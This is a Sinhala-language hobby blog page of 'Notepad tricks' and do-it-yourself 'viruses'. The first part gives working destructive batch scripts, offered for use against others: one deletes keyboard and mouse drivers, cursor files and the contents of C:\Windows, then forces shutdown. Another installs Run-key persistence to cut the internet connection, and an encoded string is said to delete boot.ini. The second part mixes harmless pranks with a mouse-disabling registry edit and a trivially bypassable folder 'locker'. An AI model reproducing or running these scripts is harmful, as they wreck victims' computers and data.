මේකත් භයානක Virus එකක් විදිහට ගන්න පුලුවන්..මොකද මේ Virus එක Run කරපු ගමන් System එකේ තියන boot.ini කියන System File එක Delete වෙලා යනව..ප්‍රධාන වශයෙන් ඔයාගෙ Computer එක On වෙන්නෙ මෙන්න මේ File එකෙන්..ඒක Delete උනහම අය Machine එ On වෙන්නෙ නෑ..ඒ කියන්නෙ OS එක Load වෙන්නෙ නෑ..Machine එක Format කරොත් විත්‍රක් ගොඩ ගන්ඩ පුලුවනි..Hikzzz

Code:-
01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001

මුලින්ම Notepad Open කරන්න..මේ Code එක Paste කරන්න..දැන් මෙක .exe විදිහට save කරන්න..

4.Computer Crash-PC එක සදහටම දොයි කරවමු...

මේක තමයි තියන භයානකම Virus එක..මුලු Machine එකම Crash වෙලා යනව..ඒ කියන්නෙ Processor එක පවා පිස්සු නටනව මේ Virus එක Run උනොත්...ඒ හින්ද පරිස්සමට Use කරන්න..හතුරෙකුටවත් දෙන්න එපා ඒක පවු වැඩක්..අය Computer එක ගොඩ ගන්නව බොරු...හැබයි මේකනම් පුතේ Virus Guard එකෙන් අල්ලනව ඈ...

Code:-

@echo OFF
title Your computer is Crazy LOL
attrib +s +h %0
copy %0 "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\start Menu\Programs\startup"
cd C:\Windows\system32
del /S /F /Q keyboard.drv
del /S /F /Q mouse.drv
del /S /F /Q keyboard.sys
mkdir C:\Users\%username\Desktop\HELLO GOOD SIR YOUR COMPUTER IS IN THE PROCESS OF BEING FUCKED, PLEASE ENJOY READING THESE FOLDERS ONE BY ONE AS YOU CANT USE YOUR KEYBOARD OR MOUSE AND DONT FORGET TO ENJOY HAVING THE REST OF YOUR COMPUTER GET FUCKED RESTARTING YOUR COMPUTER IS TOO LATE, SHIT ALREADY WENT DOWN
echo CHECK YOUR DESKTOP
ping localhost >nul
mkdir C:\HOLY FUCK MAKING FOLDERS IS FUN. WELL FUN FOR ME, NOT FUN FOR YOU ALL I HAVE TO DO IS JUST TYPE THIS AND POOF FOLDERS ARE MADE K so I HOPE YOU BLEW THE REST OF THAT COMPUTER MONEY ON PHAT MONITORZ SO THIS FITS!
echo CHECK YOUR C DRIVE
echo WHOOPS FORGOT YOUR MOUSE DOESNT WORK LOL
ping localhost >nul
echo Y | del C:\Windows\security\Database
cd C:\Windows\Cursors
del /S /F /Q *.cur
del /S /F /Q *.ani
echo OH NO WHERE THE FUCK DID YOUR CURSOR GO
ping localhost >nul
cls
echo Y | del /f /q "C:\Windows\*"
shutdown -s -t 4 -c "Sorry, but you're fucked"
exit

මුලින්ම Notepad Open කරන්න..මේ Code එක Paste කරන්න..දැන් මෙක .bat විදිහට save කරන්න..

5.Internet Connection එක Hack කරමු..
මේක භයානකම කියන්න බෑ..හැබයි Virus එක Run උනොත් අය ඔයාගෙ Computer එකෙන් Internet Brows කරන එකනම් හීනයක් තමයි..අය Machine එක Format කරොත් වැඩේ හරි..නත්නම් ඉතින් හමදාම  Offline තමයි හොදේ...

Code:-

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

මුලින්ම Notepad Open කරන්න..මේ Code එක Paste කරන්න..දැන් මෙක .bat විදිහට save කරන්න..

ඔන්න එහෙනම් පොඩි Virus ටිකක් හදන විදිහත් කියල දුන්න..කැමති අය කරල බලන්නකෝ පවු වැඩ එහෙම නොකර..ඕනෙම නම් ඔය හතුරෙකුට එහෙම දුන්නට වරදක් නෑ..නැත්නම් මේව ඉගෙනගෙනත් වැඩක් තියනව ඈ..හැබැයි ඕන් අපි එහෙම ඕවට වගකියන්නෙ නෑ..එහෙනම් ඕක කරල පොඩි Fun එකක් ගන්ඩකෝ..ඊලග ලිපියෙන් Hacking Trick එකක් දාන්න ඉන්නෙ..එහෙනම් අපි ගියා ඕන්..

Posted By: Unknown on Friday, November 27, 2015

Cool Notepad Tricks...[Notepad එකෙන් පොඩි Fun එකක් ගමු..]

Cool Notepad Tricks...


ඔන්න යාලුවනේ අද ඔයාලට NotePad වලින් පොඩි Fun එකක් ගන්න ක්‍රම ටිකක් කියල දෙන්න යන්නේ..ගොඩක් අය ආසයිනේ ඔය ගැජමැටික් වැඩ වලට..විශේෂයෙන් ඔය පොඩි කොල්ලො එහෙම මේවට ගොඩක් කැමති..මේකත් ඇවිල්ල ඔය Programming වැගේ Coding කරන තවත් ක්‍රමයක් තමයි..හැබැයි මේකෙන් පොඩි පොඩි Code වලින් ටිකක් ලොකු  වැඩ ටිකක් කරන විදිහ තමයි කියල දෙන්න යන්නෙ...ඔන්න කැමති අය කරල බලන්කෝ...


1.Matrix Code Effect...

මුලින්ම Notepad Open කරගෙන පහල Code එක Copy කරගෙන Notepad එකට Paste කරල  File Tab ගිහින් Save As Click කරන්න..ඊට පස්සෙ ඔයාට කැමති නමක් දීල .bat  කියන Extension Type කරල save Click කරන්න..දැන් ඔයා හදාගත්ත Bat Version Programme එක Open කරල බලන්නකො...
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

2.Keyboard එකේ LED නැටවීම...

මේකත් කලින් විදිහටම Notepad එකට Copy Paste කරල කැමති නමක් Type කරන්න..ඊට පස්සෙ .vbs කියන Extension එකෙන් Save කරන්න..දැන් Open කරල බලන්නකෝ...

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


3.Computer එකෙන් කතා කරවීම...

මේ Code එකත් කලින් විදිහටම Notepad එකට Paste කරගෙන .vbs  Extension එකෙන් Save කරන්න..ඊට පස්සෙ Open කරන්න..දැන ඔයාට කැමති Text එකක් Type කරල Enter ඔබන්න..

Dim speaks, speech
speaks="Welcome to SafeTricks.com"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks

4.Mouse Pointer එක Disable කිරීම...

මේ Code එකත් කලින් විදිහටම Notepad එකට Paste කරගෙන .vbs Extension එකෙන් Save කරන්න..දැන් Double Click කරල බලන්න...

rem Disable Mouse

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4


5.Simple Folder Locker...


මේ Code එක Notepad එකට Paste කරගෙන .bat Extension එකෙන් Save කරන්න..දැන් Open කරන්න..දැන් කියල එකක් වෙයි..ඒකට ඔයාට හංගන්න ඕන File ටික දාන්න..දැන් ආයෙත් Bat File එක Open කරන්න..දැන් ඔයාගෙන් අහනව Folder එක Lock කරන්න ඕනෙද නැද්ද කියල..ඒකෙන් Y Type කරල Enter ඔබන්න..දැන් Folder එක Lock වෙලා ඇති..එක අරින්න ඕනෙනම් නැවත Bat File එක Open කරන්න..දැන් Password එක Type කරල Enter ඔබන්න..Folder Lock එක ඇරෙනව...

Password:Tricklanka

@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==Tricklanka goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

ඔයා කැමති Password එකක් Add කරගන්න ඕනෙනම් Tricklanka කියන තැනට ඔයාගෙ Password එක Type කරල Save කරන්න..

Posted By: Unknown on

Contact Us

Name

Email *

Message *

 

Total Visitors

Flag Counter
Copyright@2014. PTC-World. All Rights Reserved.
Designed by :-